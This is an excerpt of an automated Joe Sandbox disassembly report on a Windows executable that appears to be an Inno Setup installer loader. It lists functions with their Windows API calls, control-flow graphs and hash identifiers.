                                                                • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8,00000000), ref: 00409A70
                                                                • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8), ref: 00409AA4
                                                              • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                              • DestroyWindow.USER32(00010452,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                              • API String ID: 3586484885-3001827809
                                                              • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                              • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                              • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                              • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D
                                                              Function 004099EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8,00000000), ref: 00409A70
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                              • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02101D74,00409AD8), ref: 00409AA4
                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02101D74), ref: 0040966C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                              • String ID: D
                                                              • API String ID: 3356880605-2746444292
                                                              • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                              • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                              • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                              • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69
                                                              Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                              APIs
                                                              • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                              • String ID:
                                                              • API String ID: 730355536-0
                                                              • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                              • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                              • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                              • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                              Function 0040A814 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: .tmp$y@
                                                              • API String ID: 2030045667-2396523267
                                                              • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                              • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                              • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                              • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD
                                                              Function 0040A82F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: .tmp$y@
                                                              • API String ID: 2030045667-2396523267
                                                              • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                              • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                              • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                              • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD
                                                              Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: .tmp
                                                              • API String ID: 1375471231-2986845003
                                                              • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                              • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                              • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                              • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65
                                                              Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 348 407787 345->348 349 4077f9 345->349 346->347 351 407700-407704 347->351 352 4076f4-4076fb call 4073ec 347->352 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 360 407803-407819 353->360 362 407791-407792 353->362 354->360 358 407841-407843 355->358 356->354 361 40785b-40785c 358->361 360->361 372 40781b 360->372 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 384 407912-407917 363->384 385 4078ed-407910 363->385 381 407820-407823 364->381 382 407890-407893 364->382 368 407743 365->368 369 4077b5 365->369 366->369 373 407746-407747 368->373 374 4077b9 368->374 377 4077b6-4077b7 369->377 378 4077f7-4077f8 369->378 379 40781e-40781f 372->379 373->342 380 4077bb-4077cd 373->380 374->380 377->374 378->349 379->381 380->358 386 4077cf-4077d4 380->386 387 407824 381->387 388 407898 381->388 382->388 385->384 385->385 386->355 392 4077d6-4077de 386->392 389 40789a 387->389 391 407825 387->391 388->389 395 40789f 389->395 393 407896-407897 391->393 394 407826-40782d 391->394 392->345 404 4077e0 392->404 393->388 397 4078a1 394->397 398 40782f 394->398 395->397 402 4078a3 397->402 403 4078ac 397->403 400 407832-407833 398->400 401 4078a5-4078aa 398->401 400->355 400->379 405 4078ae-4078af 401->405 402->401 403->405 404->378 405->395 406 4078b1-4078bd 405->406 406->388 407 4078bf-4078c0 406->407
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                              • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                              • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                              • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B
                                                              Function 00401FD4 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 419 401ff1-401ff6 414->419 415->416 417 402038-40203c 416->417 418 4020cb-4020d1 416->418 420 402041-402050 417->420 421 40203e 417->421 423 4020d3-4020e0 418->423 424 40211d-40211f call 401ee0 418->424 422 40214f-402158 419->422 420->418 425 402052-402060 420->425 421->420 427 4020e2-4020ea 423->427 428 4020ef-40211b call 402f54 423->428 432 402124-40213b 424->432 430 402062-402066 425->430 431 40207c-402080 425->431 427->428 428->422 434 402068 430->434 435 40206b-40207a 430->435 437 402082 431->437 438 402085-4020a0 431->438 440 402147 432->440 441 40213d-402142 RtlLeaveCriticalSection 432->441 434->435 439 4020a2-4020c6 call 402f54 435->439 437->438 438->439 439->422 441->440
                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                              • String ID:
                                                              • API String ID: 296031713-0
                                                              • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                              • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                              • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                              • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48
                                                              Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLibraryLoadMode
                                                              • String ID:
                                                              • API String ID: 2987862817-0
                                                              • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                              • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                              • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                              • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                              Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                              • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                              • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                              • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                              Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastRead
                                                              • String ID:
                                                              • API String ID: 1948546556-0
                                                              • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                              • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                              • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                              • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                              Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                              • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                              • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                              • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                              • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                              Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                              • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                              • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                              • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                              Function 00405280 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                              • String ID:
                                                              • API String ID: 1658689577-0
                                                              • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                              • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                              • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                              • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                              Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                              • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                              • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                              • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                              Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
